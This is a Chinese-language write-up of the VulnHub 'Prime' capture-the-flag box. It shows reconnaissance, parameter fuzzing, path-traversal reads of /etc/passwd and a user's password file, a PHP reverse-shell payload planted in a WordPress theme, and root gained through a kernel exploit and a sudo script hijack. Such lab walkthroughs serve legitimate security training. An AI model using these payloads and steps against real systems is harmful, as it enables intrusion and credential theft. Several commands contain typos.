Prime
Prime
下载地址:https://www.vulnhub.com/entry/prime-1,358/
wordpress 的主题文件的目录:https://www.php.cn/cms/wordpress/426781.html
openssl:
https://linuxconfig.org/using-openssl-to-encrypt-messages-and-files-on-linux
https://www.digicert.com/kb/ssl-support/openssl-quick-reference-guide.htm
1、主机发现
┌──(de1te㉿de1te)-[~]
└─$ sudo nmap -sn 192.168.239.0/24
[sudo] de1te 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-31 10:21 CST
Nmap scan report for 192.168.239.1
Host is up (0.00068s latency).
MAC Address: 00:50:56:C0:00:03 (VMware)
Nmap scan report for 192.168.239.134
Host is up (0.00011s latency).
MAC Address: 00:0C:29:CE:9B:03 (VMware)
Nmap scan report for 192.168.239.254
Host is up (0.00010s latency).
MAC Address: 00:50:56:E5:9F:A6 (VMware)
Nmap scan report for 192.168.239.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 19.00 seconds
- 主机为192.168.239.134
2、nmap扫描与分析
-
开放端口扫描
┌──(de1te㉿de1te)-[~] └─$ sudo nmap --min-rate 10000 -p- 192.168.239.134 Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-31 10:22 CST Nmap scan report for 192.168.239.134 Host is up (0.000071s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 00:0C:29:CE:9B:03 (VMware) Nmap done: 1 IP address (1 host up) scanned in 10.83 seconds- 22,80端口开放,如果在现实中记得扫两遍防止出现网络问题影响结果
- 优先级分析,先80后20
-
开放端口服务版本扫描
┌──(de1te㉿de1te)-[~] └─$ sudo nmap -sT -sV -O -p 22,80 192.168.239.134 Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-31 10:24 CST Nmap scan report for 192.168.239.134 Host is up (0.00032s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 00:0C:29:CE:9B:03 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.26 secondsUDP扫描
┌──(de1te㉿de1te)-[~] └─$ sudo nmap -sU -p 22,80 192.168.239.134 Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-31 10:26 CST Nmap scan report for 192.168.239.134 Host is up (0.00031s latency). PORT STATE SERVICE 22/udp closed ssh 80/udp closed http MAC Address: 00:0C:29:CE:9B:03 (VMware) Nmap done: 1 IP address (1 host up) scanned in 8.68 seconds显示22,80端口关闭
-
常见漏洞扫描
┌──(de1te㉿de1te)-[~] └─$ sudo nmap --script=vuln -p22,80 192.168.239.134 Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-31 10:32 CST Stats: 0:01:48 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 98.52% done; ETC: 10:34 (0:00:01 remaining) Nmap scan report for 192.168.239.134 Host is up (0.00036s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-enum: | /wordpress/: Blog |_ /wordpress/wp-login.php: Wordpress login page. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. MAC Address: 00:0C:29:CE:9B:03 (VMware) Nmap done: 1 IP address (1 host up) scanned in 329.75 seconds- 第一个漏洞是DOS攻击,对于渗透来说没啥用
- 第二个提示这个网站应该使用的是wordpress CMS,这点值得注意!!!
查看80端口网页:
只有一张图,emm
他的html代码
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
</html>
3、目录爆破与模糊测试
-
目录扫描
目录爆破常用工具:dirb,gobuster,fixobuster
在使用目录爆破工具时,要更注意工具的参数的设置,而不是工具本身
┌──(de1te㉿de1te)-[~] └─$ sudo dirb http://192.168.239.134 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Fri Mar 31 10:44:48 2023 URL_BASE: http://192.168.239.134/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.239.134/ ---- + http://192.168.239.134/dev (CODE:200|SIZE:131) + http://192.168.239.134/index.php (CODE:200|SIZE:136) ==> DIRECTORY: http://192.168.239.134/javascript/ + http://192.168.239.134/server-status (CODE:403|SIZE:303) ==> DIRECTORY: http://192.168.239.134/wordpress/ ---- Entering directory: http://192.168.239.134/javascript/ ---- ==> DIRECTORY: http://192.168.239.134/javascript/jquery/ ---- Entering directory: http://192.168.239.134/wordpress/ ---- + http://192.168.239.134/wordpress/index.php (CODE:301|SIZE:0) ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/ ==> DIRECTORY: http://192.168.239.134/wordpress/wp-content/ ==> DIRECTORY: http://192.168.239.134/wordpress/wp-includes/ + http://192.168.239.134/wordpress/xmlrpc.php (CODE:405|SIZE:42) ---- Entering directory: http://192.168.239.134/javascript/jquery/ ---- + http://192.168.239.134/javascript/jquery/jquery (CODE:200|SIZE:284394) ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/ ---- + http://192.168.239.134/wordpress/wp-admin/admin.php (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/css/ ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/images/ ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/includes/ + http://192.168.239.134/wordpress/wp-admin/index.php (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/js/ ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/maint/ ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/network/ ==> DIRECTORY: http://192.168.239.134/wordpress/wp-admin/user/ ---- Entering directory: http://192.168.239.134/wordpress/wp-content/ ---- + http://192.168.239.134/wordpress/wp-content/index.php (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.239.134/wordpress/wp-content/plugins/ ==> DIRECTORY: http://192.168.239.134/wordpress/wp-content/themes/ ==> DIRECTORY: http://192.168.239.134/wordpress/wp-content/uploads/ ---- Entering directory: http://192.168.239.134/wordpress/wp-includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/js/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/maint/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/network/ ---- + http://192.168.239.134/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0) + http://192.168.239.134/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.239.134/wordpress/wp-admin/user/ ---- + http://192.168.239.134/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0) + http://192.168.239.134/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.239.134/wordpress/wp-content/plugins/ ---- + http://192.168.239.134/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0) ---- Entering directory: http://192.168.239.134/wordpress/wp-content/themes/ ---- + http://192.168.239.134/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0) ---- Entering directory: http://192.168.239.134/wordpress/wp-content/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Fri Mar 31 10:45:19 2023 DOWNLOADED: 46120 - FOUND: 15从上面来看,dev值得关注。而且网页是使用wordpross CMS的
-
查看dev网页
┌──(de1te㉿de1te)-[~] └─$ sudo curl http://192.168.239.134/dev hello, now you are at level 0 stage. In real life pentesting we should use our tools to dig on a web very hard. Happy hacking.emm,他让我们深挖web,感觉就是让我们更深层次的目录挖掘。尝试指定一下文件后缀
┌──(de1te㉿de1te)-[~] └─$ sudo dirb http://192.168.239.134 -X .zip,.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Fri Mar 31 10:51:40 2023 URL_BASE: http://192.168.239.134/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt EXTENSIONS_LIST: (.zip,.txt) | (.zip)(.txt) [NUM = 2] ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.239.134/ ---- + http://192.168.239.134/secret.txt (CODE:200|SIZE:412) ----------------- END_TIME: Fri Mar 31 10:51:46 2023 DOWNLOADED: 9224 - FOUND: 1挖掘了一个secret.txt,查看一下
┌──(de1te㉿de1te)-[~] └─$ sudo curl http://192.168.239.134/secret.txt [sudo] de1te 的密码: Looks like you have got some secrets. Ok I just want to do some help to you. Do some more fuzz on every page of php which was finded by you. And if you get any right parameter then follow the below steps. If you still stuck Learn from here a basic tool with good usage for OSCP. https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web //see the location.txt and you will get your next move//让我们在所有的php页面做模糊测试,后查看loaction.txt
# 先找出所有的php文件 ┌──(de1te㉿de1te)-[~] └─$ sudo dirb http://192.168.239.134 -X .php ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Fri Mar 31 10:59:53 2023 URL_BASE: http://192.168.239.134/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt EXTENSIONS_LIST: (.php) | (.php) [NUM = 1] ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.239.134/ ---- + http://192.168.239.134/image.php (CODE:200|SIZE:147) + http://192.168.239.134/index.php (CODE:200|SIZE:136) ----------------- END_TIME: Fri Mar 31 10:59:56 2023 DOWNLOADED: 4612 - FOUND: 2两个页面,index和image页面
idnex
┌──(de1te㉿de1te)-[~] └─$ wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.239.134/index.php?FUZZ=something /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://192.168.239.134/index.php?FUZZ=something Total requests: 951 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000341: 200 7 L 19 W 206 Ch "file" Total time: 0.977494 Processed Requests: 951 Filtered Requests: 950 Requests/sec.: 972.8950emm,index出现了一个file。
可以测试一下
┌──(de1te㉿de1te)-[~] └─$ sudo curl http://192.168.239.134?file=location.txt <html> <title>HacknPentest</title> <body> <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /> </body> Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun. </html>他让我尝试在其他的页面使用secrettier360 参数
┌──(de1te㉿de1te)-[~] └─$ sudo curl http://192.168.239.134/image.php?secrettier360=location.txt <html> <title>HacknPentest</title> <body> <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p> </body> finaly you got the right parameter<br><br><br><br></html>
3、文件包含
他告诉我们获得了最终的正确参数,感觉像是文件包含
┌──(de1te㉿de1te)-[~]
└─$ sudo curl http://192.168.239.134/image.php?secrettier360=../../../.../../etc/passwd
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>
-
passwd中有victor,saket,root三个值得我们注意的
-
saket上说
find password.txt file in my directory:/home/saket:那我们尝试一下吧
┌──(de1te㉿de1te)-[~] └─$ sudo curl http://192.168.239.134/image.php?secrettier360=../../../../../home/saket/password.txt <html> <title>HacknPentest</title> <body> <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p> </body> finaly you got the right parameter<br><br><br><br>follow_the_ippsec </html>我们获得了密码:follow_the_ippsec,但不知道用在那个地方
也有可能在ssh上,不过经过测试发现不行。
emm,我们在目录爆破中发现过wordpress CMS。有没有可能是wordpress的管理后台的密码呢?尝试一下吧
这里,因为passwd上有三个用户,我就简单尝试一下发现可以。
正常情况下,我们可以使用cms扫描工具,去获取用户名
演示:
sudo wpscan --url http://192.168.239.134/wordpress -e u
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Mar 31 11:32:41 2023
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 17.017 KB
[+] Data Received: 20.176 MB
[+] Memory used: 166.508 MB
[+] Elapsed time: 00:00:04
成功:
wordpress后台常用利用方法
-
插件Plugins,自定义插件是否能上传
-
theme,看看能不能编辑文件并上传文件
-
尝试Plugin插件:
┌──(de1te㉿de1te)-[~] └─$ zip shell hash adding: hash (deflated 15%)上传插件
网页显示
Unable to create directory wp-content/uploads/2023/03. Is its parent directory writable by the server?看了第一条路走不通了
-
theme
php 反弹shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.239.129/443 0>&1'");?>访问文件
http://192.168.239.134/wordpress/wp-content/themes/twentynineteen/secret.php简单说一下,主题目录
wordpress//wp-content/themes/当前主题/访问文件www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$获得shell
4、提权
-
简单提权:shadow,定时计划,内核提权
经过验证,发现shadow和crontab都没法使用 但版本较低 Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 尝试内核提权 -
使用serachsploit搜索一下
┌──(de1te㉿de1te)-[~] └─$ searchsploit Linux ubuntu 4.10.0-28 ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results第一个不是,下载下第二个
searchsploit -m 45010 cat 45010.c # 查看脚本 # 发现利用方法 gcc cve-2017-16995.c -o cve-2017-16995 编译执行先本地编译一下,然后开启简单的http服务
sudo php -S 0:80 # 在80端口开启http服务wget htt://192.168.239.129/4510.c # 下载利用脚本 wget htt://192.168.239.129/4510 # 下载编译脚本 ls -lsah # 查看权限 789612 24K -rw-r--r-- 1 www-data www-data 22K Mar 30 22:58 45010 790522 16K -rw-r--r-- 1 www-data www-data 13K Mar 30 22:58 45010.c # 发现不能执行 chmod +x 45010 # 增加执行权限 ./45010 # 执行脚本 ./45010: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./45010) # 不行只能本地编译一下 gcc 45010.c -o 45010-2 ./45010-2 # 获得root whoami root ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 00:0c:29:ce:9b:03 brd ff:ff:ff:ff:ff:ff inet 192.168.239.134/24 brd 192.168.239.255 scope global dynamic ens33 valid_lft 1637sec preferred_lft 1637sec inet6 fe80::187c:d5b0:3aa1:fcb9/64 scope link valid_lft forever preferred_lft forever提权成功!!!
定妆照:
root@ubuntu:/root# cat root.txt cat root.txt b2b17036da1de94cfb024540a8e7075a root@ubuntu:/root# whoami whoami root root@ubuntu:/root# ip a ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 00:0c:29:ce:9b:03 brd ff:ff:ff:ff:ff:ff inet 192.168.239.134/24 brd 192.168.239.255 scope global dynamic ens33 valid_lft 1323sec preferred_lft 1323sec inet6 fe80::187c:d5b0:3aa1:fcb9/64 scope link valid_lft forever preferred_lft forever
思路二
一般来说,内核提取可能会导致系统重启或者会被管理员修复等问题,所以我们尽量不要使用内核提权
当我们sudo -l 的时候,我们发现
www-data@ubuntu:/home/saket$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc
他提醒我们有一个不需要root密码的执行权限为root的执行文件enc
对enc进行审查
# 查看文件
www-data@ubuntu:/home/saket$ cat ./enc
cat ./enc
cat: ./enc: Permission denied # 没有查看权限
# 执行一下
www-data@ubuntu:/home/saket$ ./enc
./enc
enter password: follow_the_ippsec # 没有执行成功
依次尝试了strings、file方法,它都说我们没有读的权限。执行时,需要的密码也不是我们获得的密码。
我们需要一个密码,查找一下靶机中有没有存在密码文件
find / -name '*backup*' 2>/dev/null | sort | less
- 密码通常存在于备份文件,所以我们看看能不能用
find命令查看一下 2>/dev/null丢掉报错,sort排序,less分页显示
# 值得注意的是:
/opt/backup /opt/backup/server_database/backup_pass
/var/backups
# 查看 /var/backups
www-data@ubuntu:/$ cd /var/backups
cd /var/backups
www-data@ubuntu:/var/backups$ ls
ls
alternatives.tar.0
apt.extended_states.0
dpkg.arch.0
dpkg.arch.1.gz
dpkg.diversions.0
dpkg.diversions.1.gz
dpkg.statoverride.0
dpkg.statoverride.1.gz
dpkg.status.0
dpkg.status.1.gz
group.bak
gshadow.bak
passwd.bak
shadow.bak
www-data@ubuntu:/var/backups$ cat passwd.bak
cat passwd.bak
cat: passwd.bak: Permission denied
www-data@ubuntu:/var/backups$ cat shadow.bak
cat shadow.bak
cat: shadow.bak: Permission denied
www-data@ubuntu:/var/backups$ cat gshadow.bak
cat gshadow.bak
cat: gshadow.bak: Permission denied
/var/backups目录所在的文件都不可查看
# 查看 /opt/backup 及 /opt/backup/server_database/backup_pass
www-data@ubuntu:/var/backups$ cd /opt/backup/
cd /opt/backup/
www-data@ubuntu:/opt/backup$ ls
ls
server_database
www-data@ubuntu:/opt/backup$ cd /opt/backup/server_database
cd /opt/backup/server_database
www-data@ubuntu:/opt/backup/server_database$ ls
ls
backup_pass
{hello.8}
www-data@ubuntu:/opt/backup/server_database$ cat /opt/backup/server_database/backup_pass
</server_database$ cat /opt/backup/server_database/backup_pass
your password for backup_database file enc is
"backup_password"
Enjoy!
- 我们获得
backup_password密码 - 使用
find / -name '*pass*' 2>/dev/null | sort | less也可以,但是查找速度可能会很慢
# 执行文件enc
www-data@ubuntu:/home/saket$ sudo ./enc
sudo ./enc
enter password: backup_password
good
www-data@ubuntu:/home/saket$ ls
ls
enc
enc.txt
key.txt
password.txt
user.txt
- 我们获得了
enc.txt和key.txt文件
www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
www-data@ubuntu:/home/saket$ cat key.txt
cat key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
- 他让我们将
ippsec加密成md5的形式,然后用它将enc.txt的内容进行解密·
┌──(de1te㉿de1te)-[~]
└─$ echo -n 'ippsec' | md5sum | awk -F' ' '{print $1}'
366a74cb3c959de17d61db30591c39d1
因为,我们不知道那种加密方法。于是我们就采用for循环形式
sudo awk '{gsub(/ /,"\n");print}' hash | sort | uniq > hashs
- hash保存的是openssl的所有加密方式,可以通过
openssl -help的方式查看,并粘贴复制到文件中
在openssl 的enc的模块中,解密的key是hex(十六进制的),因此我们需要将ippsec加密的md5形式进行进制转换
echo -n 'ippsec' | md5sum | awk -F' ' '{print $1}' | tr -d '\n' |od -A n -t x1 | tr -d '\n'| tr -d ' '
3336366137346362336339353964653137643631646233303539316333396431
for hash in $(cat hashs);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/s
sHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$hash -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null;echo $hash ;done;
经过查找发现
aes-256-ebc
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
看来是运用的ase-256-ebc加密算法
我们现在获得了,用户名和密码。尝试用ssh链接一下吧
┌──(de1te㉿de1te)-[~]
└─$ sudo ssh saket@192.168.239.134
[sudo] de1te 的密码:
saket@192.168.239.134's password:
Permission denied, please try again.
saket@192.168.239.134's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
661 packages can be updated.
515 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Sun Apr 2 18:44:13 2023 from 192.168.239.129
$
- 命令行不是很友好,看看有没有装python吧!
dpkg -l | grep 'python*'
- 发现装了python
$ python -c "import pty;pty.spawn('/bin/bash')"
saket@ubuntu:~$
saket@ubuntu:/tmp$ sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
saket@ubuntu:/tmp$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: Permission denied
- 好像没有challenge这个文件。尝试创建文件
cd /tmp
echo '!#/bin/bash' > challenge
enho '/bin/bash' >> challenge
chmod +x challenge
sudo sudo /home/victor/undefeated_victor
root@ubuntu:/tmp# sudo -l
Matching Defaults entries for root on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User root may run the following commands on ubuntu:
(ALL : ALL) ALL
root@ubuntu:/tmp#
- 提权成功
定妆照:
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls
enc enc.cpp enc.txt key.txt root.txt sql.py t.sh wfuzz wordpress.sql
root@ubuntu:/root# cat root.txt
b2b17036da1de94cfb024540a8e7075a
root@ubuntu:/root#
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 单线程的Redis速度为什么快?
· SQL Server 2025 AI相关能力初探
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 展开说说关于C#中ORM框架的用法!